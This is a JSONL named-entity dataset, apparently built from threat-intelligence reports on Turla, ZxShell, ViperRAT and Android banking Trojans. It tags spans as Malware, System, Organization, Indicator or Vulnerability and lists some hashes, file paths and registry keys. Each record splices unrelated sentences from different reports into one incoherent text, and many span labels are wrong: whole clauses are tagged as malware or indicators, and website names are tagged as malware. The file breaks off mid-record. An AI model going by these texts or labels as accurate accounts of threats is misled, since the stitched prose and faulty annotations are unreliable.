The primary attack vectors are watering-hole , spear phishing , and other web-based attacks . KillMilk continues to be a central coordinator for the KillNet Collective , despite claims of leaving the group in mid-2022 .", "spans": [{"start": 72, "end": 78, "label": "Malware"}, {"start": 160, "end": 170, "label": "System"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 355, "end": 363, "label": "Organization"}]} {"text": "It steals bank card information ( the number , the expiry date , CVC2/CVV2 ) imitating the process of registering the bank card with Google Play . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including military . Frequently , a remote administration tool ( RAT ) is used to maintain persistence within a victim \u2019s organization . Copies of the site at archive.org show it was the work of someone calling themselves \u201c The Chaos Creator . \u201d", "spans": [{"start": 133, "end": 144, "label": "System"}, {"start": 168, "end": 178, "label": "System"}, {"start": 257, "end": 265, "label": "Organization"}, {"start": 283, "end": 309, "label": "System"}, {"start": 312, "end": 315, "label": "System"}, {"start": 471, "end": 488, "label": "Organization"}]} {"text": "If the user has launched Play Market , the Trojan intercepts the event and displays a window on top of the Google Play window , prompting the user to enter his/her bank card details in the fake window . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including education . These tools are used to further compromise the organization by attacking other hosts inside the targets network . 
Furthermore , these reports indicated that Zarya was cooperating with or being handled by officers of Russia \u2019s Federal Security Service ( FSB ) .", "spans": [{"start": 25, "end": 36, "label": "System"}, {"start": 107, "end": 118, "label": "System"}, {"start": 224, "end": 234, "label": "System"}, {"start": 313, "end": 322, "label": "Organization"}, {"start": 541, "end": 583, "label": "Organization"}]} {"text": "The data entered by the user is sent to the cybercriminals . When G-Data published on Turla/Uroburos back in February , several questions remained unanswered . ZxShell ( aka Sensocode ) is a Remote Administration Tool ( RAT ) used by Group 72 to conduct cyber-espionage operations . If we look at our previous cyberattack incident , a spear phishing attack likely left indications of malicious browser redirects and malware installation attempts .", "spans": [{"start": 66, "end": 72, "label": "Organization"}, {"start": 86, "end": 100, "label": "Organization"}, {"start": 160, "end": 167, "label": "Malware"}, {"start": 174, "end": 183, "label": "Malware"}, {"start": 191, "end": 217, "label": "System"}, {"start": 220, "end": 223, "label": "System"}, {"start": 234, "end": 242, "label": "Organization"}, {"start": 369, "end": 445, "label": "Indicator"}]} {"text": "mobile_treats_2013_06s It extorts money from users by threatening to block the smartphone : it displays a message demanding $ 500 to unblock the device . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including research and pharmaceutical companies . Once the RAT is installed on the host it will be used to administer the client , exfiltrate data , or leverage the client as a pivot to attack an organization \u2019s internal infrastructure . 
The group has since earned infamy for being involved in malicious activities associated with targeted attacks , such as deploying spear - phishing campaigns and building a backdoor .", "spans": [{"start": 175, "end": 185, "label": "System"}, {"start": 277, "end": 301, "label": "Organization"}, {"start": 313, "end": 316, "label": "System"}, {"start": 612, "end": 672, "label": "Organization"}]} {"text": "In actual fact , the Trojan does not block anything and the phone can be used without any problems . The primary backdoor used in the Epic attacks is also known as \" WorldCupSec \" , \" TadjMakhal \" , \" Wipbot \" or \" Tavdig \" . Here is a short list of the types of tools included with ZxShell : A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": [{"start": 166, "end": 177, "label": "Organization"}, {"start": 184, "end": 194, "label": "Organization"}, {"start": 201, "end": 207, "label": "Organization"}, {"start": 215, "end": 221, "label": "Organization"}, {"start": 283, "end": 290, "label": "Malware"}, {"start": 345, "end": 352, "label": "Organization"}]} {"text": "It hides traces of its activity by masking the outgoing and incoming text messages and blocking calls and messages from numbers belonging to the bank . Thrip 's motive is likely espionage and its targets include those in the communications , geospatial imaging , and defense sectors , both in the United States and Southeast Asia . Keylogger ( used to capture passwords and other interesting data ) . 
By looking at the most likely perpetrators , we can ask who would be motivated to come after the company , what are the tactics , techniques and procedures and priorities , and what defenses are needed .", "spans": [{"start": 225, "end": 239, "label": "Organization"}, {"start": 242, "end": 260, "label": "Organization"}, {"start": 267, "end": 282, "label": "Organization"}, {"start": 332, "end": 341, "label": "System"}, {"start": 431, "end": 443, "label": "Organization"}]} {"text": "The Trojan gets the list of bank phone numbers from its C & C server . One big unknown was the infection vector for Turla ( aka Snake or Uroburos ) . Command line shell for remote administration . These groups can steal information and argue that they are practicing free speech , but more often than not , these groups will employ a DDoS Distributed Denial of Service attack to overload a website with too much traffic and cause it to crash .", "spans": [{"start": 128, "end": 133, "label": "Organization"}, {"start": 137, "end": 145, "label": "Organization"}, {"start": 150, "end": 168, "label": "System"}, {"start": 203, "end": 209, "label": "Organization"}]} {"text": "It protects itself from deletion by requesting Device Administrator rights during the installation . The mothership server is generally a VPS , which runs the Control panel software used to interact with the victims . Remote desktop . Organizations can validate their security controls using the following actions with Mandiant Security Validation .", "spans": [{"start": 138, "end": 141, "label": "System"}, {"start": 218, "end": 232, "label": "System"}]} {"text": "As a result , the Trojan delete button in the list of applications becomes inactive , which may cause problems for inexperienced users . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . Various network attack tools used to fingerprint and compromise other hosts on the network . 
The attacker also executed various Cobalt Strike components and tried to escalate privileges on the computer using PsExec .", "spans": [{"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 194, "end": 205, "label": "Vulnerability"}, {"start": 231, "end": 259, "label": "System"}, {"start": 359, "end": 372, "label": "System"}, {"start": 439, "end": 445, "label": "System"}]} {"text": "It is impossible to deprive it of these rights without the use of specialized tools ( such as Kaspersky Internet Security for Android ) . Once a victim is confirmed as \" interesting \" , the attackers upload another Epic backdoor which has a unique ID used to control this specific victim . Local user account creation tools . /Library / Ruby / Gems/2.6.0 / extensions / init.rb Ruby script 53789519 /usr / local / bin / com.docker.vmnat FULLHOUSE.DOORED 53789522 /usr / local / bin / com.docker.vmnat.lock Not recovered 54101444 /Library / Fonts / ArialUnicode.ttf.md5 STRATOFEAR ( Config ) 54102142", "spans": [{"start": 94, "end": 121, "label": "System"}, {"start": 126, "end": 133, "label": "System"}, {"start": 215, "end": 228, "label": "System"}, {"start": 290, "end": 323, "label": "System"}, {"start": 378, "end": 505, "label": "Indicator"}]} {"text": "To protect itself from being removed , Svpeng uses a previously unknown vulnerability in Android . Our analysis indicates this is a sophisticated multi-stage infection ; which begins with Epic Turla . For a complete list of tools please see the MainConnectionIo section . 
Minidionis \u2013 one more APT with a usage of cloud drives \u2022 Miniduke is back : Nemesis Gemina and the Botgen Studio More details about CozyDuke are available to customers of Kaspersky Intelligence Reporting .", "spans": [{"start": 39, "end": 45, "label": "Malware"}, {"start": 89, "end": 96, "label": "System"}, {"start": 188, "end": 198, "label": "System"}, {"start": 272, "end": 282, "label": "Organization"}, {"start": 329, "end": 337, "label": "Organization"}, {"start": 348, "end": 362, "label": "Organization"}, {"start": 371, "end": 384, "label": "Organization"}, {"start": 404, "end": 412, "label": "Malware"}, {"start": 443, "end": 477, "label": "System"}]} {"text": "It uses the same trick to prevent the smartphone from being returned to its factory settings . this attack against a Kaspersky Lab user on August 5 , 2014 . The following paper is a technical analysis on the functionality of ZxShell . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": [{"start": 117, "end": 130, "label": "Organization"}, {"start": 225, "end": 232, "label": "Malware"}]} {"text": "The Trojan is distributed in Russia and CIS countries . VENOMOUS BEAR is an advanced , Russia-based adversary that's been active since at least 2004 . The analysts involved were able to identify command and control ( C2 ) servers , dropper and installation methods , means of persistence , and identify the attack tools that are core to the RAT \u2019s purpose . 
The VPNs used by RGB actors occasionally fail , which reveals the IP addresses of the actor 's true origins .", "spans": [{"start": 56, "end": 69, "label": "Organization"}, {"start": 195, "end": 214, "label": "System"}, {"start": 217, "end": 219, "label": "System"}, {"start": 341, "end": 344, "label": "System"}, {"start": 358, "end": 366, "label": "System"}, {"start": 375, "end": 385, "label": "Organization"}, {"start": 420, "end": 436, "label": "System"}]} {"text": "But , as we have already mentioned , the criminals could easily turn their attention to users in other countries . Venomous Bear has deployed malware to targets using several novel methods . In addition , the researchers used their analysis to provide detection coverage for Snort , Fireamp , and ClamAV . In July 2023 , Mandiant Consulting responded to a supply chain compromise affecting a US - based software solutions entity .", "spans": [{"start": 115, "end": 128, "label": "Organization"}, {"start": 275, "end": 280, "label": "System"}, {"start": 283, "end": 290, "label": "System"}, {"start": 297, "end": 303, "label": "System"}, {"start": 321, "end": 340, "label": "Organization"}, {"start": 356, "end": 379, "label": "Organization"}, {"start": 390, "end": 428, "label": "Organization"}]} {"text": "Perkele and Wroba Foreign users have also been on the receiving end of several malicious innovations targeting bank accounts . For years , Turla has relied , among other impersonations , on fake Flash installers to compromise victims . ZxShell has been around since 2004 . 
Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 12, "end": 17, "label": "Malware"}, {"start": 139, "end": 144, "label": "Organization"}, {"start": 190, "end": 211, "label": "System"}, {"start": 236, "end": 243, "label": "Malware"}]} {"text": "The Perkele Android Trojan not only attacks Russian users but also clients of several European banks . Turla merely uses the Adobe brand to trick users into downloading the malware . There are a lot of versions available in the underground market . Evernote is a popular app in the healthcare community for data sharing files , notes , schedules , etc . across phones and other devices .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 103, "end": 108, "label": "Organization"}, {"start": 249, "end": 257, "label": "System"}, {"start": 282, "end": 302, "label": "Organization"}]} {"text": "It is of interest primarily because it operates in conjunction with various banking win32-Trojans . By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016 . We have analyzed the most common version of ZxShell , version 3.10 . None The Foudre string no longer present The window used for keylogging was originally named Foudre giving the malware its name , but has now been renamed to form1 to help the malware evade signaturebased detection", "spans": [{"start": 84, "end": 97, "label": "System"}, {"start": 153, "end": 158, "label": "Organization"}, {"start": 293, "end": 300, "label": "Malware"}, {"start": 327, "end": 340, "label": "Indicator"}, {"start": 359, "end": 532, "label": "Indicator"}]} {"text": "Its main task is to bypass the two-factor authentication of the client in the online banking system . 
Thus , it is clear they are trying to be as stealthy as possible by hiding in the network traffic of the targeted organizations . There are newer versions , up to version 3.39 as of October 2014 . An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash - a - Business[.]com , which Harrison dedicated to \u201c all those sorry ass corporate executives out there profiting from your hard work , organs , lives , ideas , intelligence , and wallets . \u201d", "spans": [{"start": 299, "end": 442, "label": "Malware"}]} {"text": "Due to the specific nature of its activity , Perkele is distributed in a rather unusual way . Finally , some of the victims are also infected with other Turla-related malware such as ComRAT or Gazer . An individual who goes by the name LZX in some online forums is believed to be the original author of ZxShell . Supply Chain Attack", "spans": [{"start": 45, "end": 52, "label": "Malware"}, {"start": 153, "end": 166, "label": "Organization"}, {"start": 167, "end": 174, "label": "System"}, {"start": 183, "end": 189, "label": "System"}, {"start": 193, "end": 198, "label": "System"}, {"start": 303, "end": 310, "label": "Malware"}, {"start": 313, "end": 332, "label": "Organization"}]} {"text": "When a user enters an Internet banking site on a computer infected by banking malware ( ZeuS , Citadel ) , a request about the smartphone number and type of operating system is injected into the code of the authentication page . Kaspersky Lab documented this behavior in 2014 . Since ZxShell has been around since at least 2004 , numerous people have purchased or obtained the tools necessary to set up ZxShell command and control servers ( C&C ) and generate the malware that is placed on the victim \u2019s network . 
The RAT was likely not detected before as it has the ability to remove itself from the victim machine in time for the deployment of malware .", "spans": [{"start": 88, "end": 92, "label": "Malware"}, {"start": 95, "end": 102, "label": "Malware"}, {"start": 229, "end": 242, "label": "Organization"}, {"start": 284, "end": 291, "label": "Malware"}, {"start": 403, "end": 410, "label": "Malware"}, {"start": 411, "end": 430, "label": "System"}, {"start": 441, "end": 444, "label": "System"}]} {"text": "This data is immediately sent to the cybercriminals and the computer displays the QR code containing a link to the alleged certificate of the online banking system . It is not a new tactic for Turla to rely on fake Flash installers to try to trick the user to install one of their backdoors . ZxShell has been observed to be distributed through phishing attacks , dropped by exploits that leverage vulnerabilities such as CVE-2011-2462 , CVE-2013-3163 , and CVE-2014-0322 . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": [{"start": 210, "end": 231, "label": "System"}, {"start": 293, "end": 300, "label": "Malware"}, {"start": 422, "end": 435, "label": "Vulnerability"}, {"start": 438, "end": 451, "label": "Vulnerability"}, {"start": 458, "end": 471, "label": "Vulnerability"}, {"start": 489, "end": 500, "label": "Organization"}, {"start": 584, "end": 600, "label": "Vulnerability"}]} {"text": "After scanning the QR code and installing a component downloaded from the link , the user infects his smartphone with the Trojan program that boasts functionality that is of great interest to the attackers . Turla operators could use an already-compromised machine in the network of the victim 's organization to perform a local MitM attack . 
To illustrate the functionality of main ZxShell module , Let \u2019s take a look at the following sample : \u201c So good luck , I \u2019m sure we \u2019ll talk again soon , but for now , I ve got better things in the oven , \u201d Harrison wrote to Biderman after his employment contract with Ashley Madison was terminated .", "spans": [{"start": 383, "end": 390, "label": "Malware"}, {"start": 550, "end": 558, "label": "Organization"}, {"start": 568, "end": 576, "label": "Organization"}, {"start": 612, "end": 626, "label": "Organization"}]} {"text": "Perkele intercepts mTANs ( confirmation codes for banking operations ) sent by the bank via text message . Our January 2018 white paper was the first public analysis of a Turla campaign called Mosquito . MD5 : e3878d541d17b156b7ca447eeb49d96a . Minidionis \u2013 one more APT with a usage of cloud drives \u2022 Miniduke is back : Nemesis Gemina and the Botgen Studio More details about CozyDuke are available to customers of Kaspersky Intelligence Reporting .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 210, "end": 242, "label": "Indicator"}, {"start": 245, "end": 255, "label": "Organization"}, {"start": 302, "end": 310, "label": "Organization"}, {"start": 321, "end": 335, "label": "Organization"}, {"start": 344, "end": 357, "label": "Organization"}, {"start": 377, "end": 385, "label": "Malware"}, {"start": 416, "end": 450, "label": "System"}]} {"text": "By using the login and password stolen from the browser , the Windows Trojan initiates a fake transaction while Perkele intercepts ( via the C & C server ) the mTAN sent by the bank to the user . It is not the first time Turla has used generic tools . SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c . 
Harrison even went after Bradshaw \u2019s lawyer and wife , listing them both on a website he created called Contact - a - CEO[.]com , which Harrison used to besmirch the name of major companies \u2014 including several past employers \u2014 all entities he believed had slighted him or his family in some way .", "spans": [{"start": 112, "end": 119, "label": "Malware"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 236, "end": 249, "label": "System"}, {"start": 261, "end": 325, "label": "Indicator"}, {"start": 328, "end": 336, "label": "Organization"}, {"start": 353, "end": 380, "label": "Organization"}]} {"text": "Money then disappears from the victim \u2019 s account and is cashed in without the owner \u2019 s knowledge . In the past , we have seen the group using open-source password dumpers such as Mimikatz . It exports the following functions , which are examined in greater detail below : DllMain Install UnInstall ServiceMain ShellMain ShellMainThread zxFunction001 zxFunction002 . An attacker with access to a valid cookie can establish an authenticated session to the NetScaler appliance without knowledge of the username , password , or access to a multi - factor authentication token or device .", "spans": [{"start": 144, "end": 172, "label": "System"}, {"start": 181, "end": 189, "label": "System"}, {"start": 368, "end": 379, "label": "Organization"}]} {"text": "The Korean malware Wroba , in addition to the traditional vector of infection via file-sharing services , spreads via alternative app stores . Starting in March 2018 , we observed a significant change in the campaign : it now leverages the open source exploitation framework Metasploit before dropping the custom Mosquito backdoor . DllMain performs the initialization of ZxShell . 
Get Ready for Ransomware in 2023 with the ThreatConnect Platform", "spans": [{"start": 19, "end": 24, "label": "Malware"}, {"start": 275, "end": 285, "label": "System"}, {"start": 372, "end": 379, "label": "Malware"}]} {"text": "Once it infects a device , Wroba behaves very aggressively . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure . It allocates a buffer of 0x2800 bytes and copies the code for the ZxGetLibAndProcAddr function . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": [{"start": 27, "end": 32, "label": "Malware"}, {"start": 117, "end": 131, "label": "Malware"}, {"start": 376, "end": 536, "label": "Malware"}]} {"text": "It searches for mobile banking applications , removes them and uploads counterfeit versions . However , to our knowledge , this is the first time Turla has used Metasploit as a first stage backdoor , instead of relying on one of its own tools such as Skipper . To copy memory , the memcpy function is invoked . The code hunted for several security products to evade \u2013 including Kaspersky .", "spans": [{"start": 161, "end": 171, "label": "System"}, {"start": 251, "end": 258, "label": "System"}, {"start": 339, "end": 356, "label": "Organization"}, {"start": 378, "end": 387, "label": "Organization"}]} {"text": "From the outside , they are indistinguishable from the legitimate applications . Traffic was intercepted on a node between the end machine and the Adobe servers , allowing Turla 's operators to replace the legitimate Flash executable with a trojanized version . It is not directly used from msvcrt.dll but is instead copied to another memory chunk before being called . 
They claim to have compromised the company and are willing to help resolve the issue .", "spans": [{"start": 291, "end": 301, "label": "Indicator"}, {"start": 389, "end": 454, "label": "Malware"}]} {"text": "However , they possess no banking functions , and merely steal the logins and passwords entered by users . At the beginning of March 2018 , as part of our regular tracking of Turla 's activities , we observed some changes in the Mosquito campaign . Finally , the trojan Import Address Table ( IAT ) is resolved and the file path of the process that hosts the DLL is resolved and saved in a global variable . The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": [{"start": 175, "end": 180, "label": "Organization"}, {"start": 263, "end": 269, "label": "Malware"}, {"start": 270, "end": 290, "label": "System"}, {"start": 293, "end": 296, "label": "System"}, {"start": 359, "end": 362, "label": "System"}, {"start": 465, "end": 476, "label": "Malware"}, {"start": 481, "end": 495, "label": "Malware"}]} {"text": "ViperRAT : The Mobile APT Targeting The Israeli Defense Force That Should Be On Your Radar February 16 , 2017 ViperRAT is an active , advanced persistent threat ( APT ) that sophisticated threat actors are actively using to target and spy on the Israeli Defense Force.The threat actors behind the ViperRAT surveillanceware collect a significant amount of sensitive information off of the device , and seem most interested in exfiltrating images and audio content . In this post , we have presented the evolutions of the Turla Mosquito campaign over the last few months . ZxShell.dll is injected in a shared SVCHOST process . 
If an IOC is malicious and the file available to us , Symantec Endpoint products will detect and block that file .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 40, "end": 61, "label": "Organization"}, {"start": 110, "end": 118, "label": "Malware"}, {"start": 246, "end": 271, "label": "Organization"}, {"start": 297, "end": 305, "label": "Malware"}, {"start": 571, "end": 582, "label": "Indicator"}, {"start": 607, "end": 614, "label": "System"}, {"start": 631, "end": 634, "label": "Indicator"}, {"start": 679, "end": 705, "label": "System"}]} {"text": "The attackers are also hijacking the device camera to take pictures . Primary targets for this adversary are in the government , aerospace , NGO , defense , cryptology and education sectors . The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service . The findings , compiled together in the 2023 State of Ransomware Report , show alarming trends in the global ransomware surge from July 2022 to June 2023 .", "spans": [{"start": 116, "end": 126, "label": "Organization"}, {"start": 129, "end": 138, "label": "Organization"}, {"start": 141, "end": 144, "label": "Organization"}, {"start": 147, "end": 154, "label": "Organization"}, {"start": 157, "end": 167, "label": "Organization"}, {"start": 172, "end": 189, "label": "Organization"}, {"start": 196, "end": 203, "label": "System"}, {"start": 223, "end": 254, "label": "System"}, {"start": 299, "end": 305, "label": "System"}, {"start": 407, "end": 442, "label": "Organization"}]} {"text": "Using data collected from the Lookout global sensor network , the Lookout research team was able to gain unique visibility into the ViperRAT malware , including 11 new , unreported applications . 
Turla 's campaign still relies on a fake Flash installer but , instead of directly dropping the two malicious DLLs , it executes a Metasploit shellcode and drops , or downloads from Google Drive , a legitimate Flash installer . Before the malware can be installed a unique name must to be generated for the service . But after being informed that Bradshaw was not subject to Canadian trademark laws , Avid Life offered to buy AshleyMadisonSucks.com for $ 10,000 .", "spans": [{"start": 30, "end": 37, "label": "Organization"}, {"start": 132, "end": 140, "label": "Malware"}, {"start": 327, "end": 357, "label": "System"}, {"start": 543, "end": 551, "label": "Organization"}, {"start": 597, "end": 606, "label": "Organization"}, {"start": 622, "end": 644, "label": "Organization"}]} {"text": "We also discovered and analyzed live , misconfigured malicious command and control servers ( C2 ) , from which we were able to identify how the attacker gets new , infected apps to secretly install and the types of activities they are monitoring . The Turla espionage group has been targeting various institutions for many years . The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost . 
Given Sandworm 's global threat activity and the worldwide deployment of MicroSCADA products , asset owners globally should take action to mitigate their tactics , techniques , and procedures against IT and OT systems .", "spans": [{"start": 382, "end": 388, "label": "System"}, {"start": 421, "end": 428, "label": "System"}, {"start": 457, "end": 488, "label": "System"}, {"start": 523, "end": 557, "label": "Organization"}, {"start": 590, "end": 600, "label": "System"}, {"start": 612, "end": 624, "label": "Organization"}, {"start": 717, "end": 734, "label": "System"}]} {"text": "In addition , we uncovered the IMEIs of the targeted individuals ( IMEIs will not be shared publicly for the privacy and safety of the victims ) as well as the types of exfiltrated content . Recently , we found several new versions of Carbon , a second stage backdoor in the Turla group arsenal . At startup , Svchost.exe checks the services part of the registry and constructs a list of services to load . At the end of There is a call to the main function of the malware that contains all its functionality .", "spans": [{"start": 235, "end": 241, "label": "System"}, {"start": 310, "end": 321, "label": "Indicator"}, {"start": 432, "end": 508, "label": "Malware"}]} {"text": "In aggregate , the type of information stolen could let an attacker know where a person is , with whom they are associated ( including contacts \u2019 profile photos ) , the messages they are sending , the websites they visit and search history , screenshots that reveal data from other apps on the device , the conversations they have in the presence of the device , and a myriad of images including anything at which device \u2019 s camera is pointed . The Turla group is known to be painstaking and work in stages , first doing reconnaissance on their victims' systems before deploying their most sophisticated tools such as Carbon . Each Svchost session can contain multiple shared services that are organized in groups . 
Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality , or without the logical preconditions to trigger their expected function .", "spans": [{"start": 618, "end": 624, "label": "System"}, {"start": 632, "end": 639, "label": "System"}]} {"text": "Lookout has determined ViperRAT is a very sophisticated threat that adds to the mounting evidence that targeted mobile attacks against governments and business is a real problem . Kaspersky APT Intelligence Reporting subscription , customers received an update in mid-February 2017 . Therefore , separate services can run , depending on how and where Svchost.exe is started . The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 23, "end": 31, "label": "Malware"}, {"start": 180, "end": 229, "label": "Organization"}, {"start": 351, "end": 362, "label": "Indicator"}, {"start": 462, "end": 513, "label": "Vulnerability"}]} {"text": "Lookout researchers have been tracking this threat for the last month . Like previous Turla activity , WhiteBear leverages compromised websites and hijacked satellite connections for command and control ( C2 ) infrastructure . Svchost.exe groups are identified in the above registry key . 
Fortunately , an artifact of its execution was discovered in the /private / var / db / oah directory .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 103, "end": 112, "label": "System"}, {"start": 227, "end": 238, "label": "Indicator"}, {"start": 303, "end": 389, "label": "Indicator"}]} {"text": "Given that this is an active threat , we \u2019 ve been working behind-the-scenes with our customers to ensure both personal and enterprise customers are protected from this threat and only decided to come forward with this information after the research team at Kaspersky released a report earlier today . WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report \" Skipper Turla \u2013 the White Atlas framework \" from mid-2016 . Each value under this key represents a separate Svchost group and appears as a separate instance when you are viewing active processes . The videos were quickly passed around offices while users \u2019 systems were silently infected in the background , and many of the APT \u2019s components were signed with phony Intel and AMD digital certificates .", "spans": [{"start": 258, "end": 267, "label": "Organization"}, {"start": 302, "end": 311, "label": "System"}, {"start": 357, "end": 370, "label": "System"}, {"start": 443, "end": 456, "label": "System"}, {"start": 463, "end": 474, "label": "System"}, {"start": 551, "end": 558, "label": "System"}]} {"text": "Additionally , we have determined that though original reports of this story attribute this surveillanceware tool to Hamas , this may not be the case , as we demonstrate below . However , despite the similarities to previous Turla campaigns , we believe that WhiteBear is a distinct project with a separate focus . Each value is a REG_MULTI_SZ value and contains the services that run under that Svchost group . 
A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": [{"start": 117, "end": 122, "label": "Organization"}, {"start": 259, "end": 268, "label": "System"}, {"start": 396, "end": 403, "label": "System"}, {"start": 414, "end": 432, "label": "System"}, {"start": 511, "end": 532, "label": "System"}]} {"text": "The increasing sophistication of surveillanceware The structure of the surveillanceware indicates it is very sophisticated . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world . Each Svchost group can contain one or more service names that are extracted from the following registry key , whose Parameters key contains a ServiceDLL value : HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Service . The final payload of the July 2023 campaign is njRAT , which increases our confidence that the threat actor 's goals are information stealing and remote control of the targeted systems .", "spans": [{"start": 202, "end": 211, "label": "Organization"}, {"start": 260, "end": 267, "label": "System"}, {"start": 397, "end": 407, "label": "System"}, {"start": 526, "end": 531, "label": "Malware"}]} {"text": "Analysis indicates there are currently two distinct variants of ViperRAT . Continued WhiteBear activity later shifted to include defense-related organizations into June 2017 . On a Windows machine , the netsvc group contains names of both existing and non-existing services . 
$ HOME / Library / LaunchAgents / com.studentd.agent.plist", "spans": [{"start": 64, "end": 72, "label": "Malware"}, {"start": 129, "end": 158, "label": "Organization"}, {"start": 181, "end": 188, "label": "System"}, {"start": 203, "end": 209, "label": "System"}, {"start": 276, "end": 334, "label": "Indicator"}]} {"text": "The first variant is a \u201c first stage application , \u201d that performs basic profiling of a device , and under certain conditions attempts to download and install a much more comprehensive surveillanceware component , which is the second variant . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations . ZxShell exploits this fact by cycling between each of the names , verifying the existence of the real service . Sometimes this was a high profile , legitimate site such as \u2018 diplomacy.pl \u2019 hosting a ZIP archive .", "spans": [{"start": 263, "end": 272, "label": "System"}, {"start": 297, "end": 306, "label": "Organization"}, {"start": 353, "end": 360, "label": "Malware"}, {"start": 486, "end": 563, "label": "Indicator"}]} {"text": "The first variant involves social engineering the target into downloading a trojanized app . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year . The service \u2019s existence is verified with the ServiceExists function , which attempts to open the relative registry sub-key in HKLM\\SYSTEM\\CurrentControlSet\\Services . 
CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 193, "end": 220, "label": "Organization"}, {"start": 411, "end": 422, "label": "Organization"}]} {"text": "Previous reports alleged this surveillanceware tool was deployed using \u2018 honey traps \u2019 where the actor behind it would reach out to targets via fake social media profiles of young women . Our investigation also led to the discovery of dozens of email addresses registered by Turla operators for this campaign and used to receive exfiltrated data from the victims . The first service name that is not installed on the system becomes the ZxShell service name . The MOVEit data breaches had widespread impacts , affecting everything from the Oregon DMV and Louisiana OMV ( Office of Motor Vehicles)\u2014including the leak of nearly 10 million drivers ' licenses \u2014 to the University of Rochester and multiple corporations .", "spans": [{"start": 436, "end": 443, "label": "Malware"}, {"start": 463, "end": 469, "label": "System"}, {"start": 539, "end": 549, "label": "Organization"}, {"start": 550, "end": 567, "label": "Organization"}, {"start": 664, "end": 687, "label": "Organization"}, {"start": 692, "end": 713, "label": "Organization"}]} {"text": "After building an initial rapport with targets , the actors behind these social media accounts would instruct victims to install an additional app for easier communication . It mainly targets Microsoft Outlook , a widely used mail client , but also targets The Bat! , a mail client very popular in Eastern Europe . 
A new service is then created using the service parser function ProcessScCommand . None Read about adversaries tracked by CrowdStrike in 2021 in the and in the \u2022 None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": [{"start": 437, "end": 448, "label": "Organization"}]} {"text": "Specifically , Lookout determined these were trojanized versions of the apps SR Chat and YeeCall Pro . First , Turla steals emails by forwarding all outgoing emails to the attackers . ZxShell implemented its own version of the Windows B-TOOL S-OS SC command . The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 77, "end": 84, "label": "System"}, {"start": 89, "end": 100, "label": "System"}, {"start": 111, "end": 116, "label": "Organization"}, {"start": 184, "end": 191, "label": "Malware"}, {"start": 330, "end": 343, "label": "Vulnerability"}, {"start": 346, "end": 397, "label": "Vulnerability"}]} {"text": "We also uncovered ViperRAT in a billiards game , an Israeli Love Songs player , and a Move To iOS app . We identified several European governments and defense companies compromised with this group . There are minor differences between the ZxShell implementation of this command and the original Windows one . 
Figure 6 : \u201c lun.vbs \u201d contents", "spans": [{"start": 18, "end": 26, "label": "Malware"}, {"start": 94, "end": 97, "label": "System"}, {"start": 126, "end": 146, "label": "Organization"}, {"start": 151, "end": 168, "label": "Organization"}, {"start": 239, "end": 246, "label": "Malware"}, {"start": 295, "end": 302, "label": "System"}, {"start": 320, "end": 331, "label": "Indicator"}]} {"text": "The second stage The second stage apps contain the surveillanceware capabilities . What actually happens is that the malware is able to decode data from the PDF documents and interpret it as commands for the backdoor . The installed service registry key is opened and the 2 values under its Parameter subkey are created . A great example is that of the notorious bank robber slick Willy Sutton .", "spans": [{"start": 157, "end": 170, "label": "System"}, {"start": 349, "end": 374, "label": "Organization"}, {"start": 381, "end": 393, "label": "Organization"}]} {"text": "Lookout uncovered nine secondary payload applications : * These apps have not been previously reported and were discovered using data from the Lookout global sensor network , which collects app and device information from over 100 million sensors to provide researchers and customers with a holistic look at the 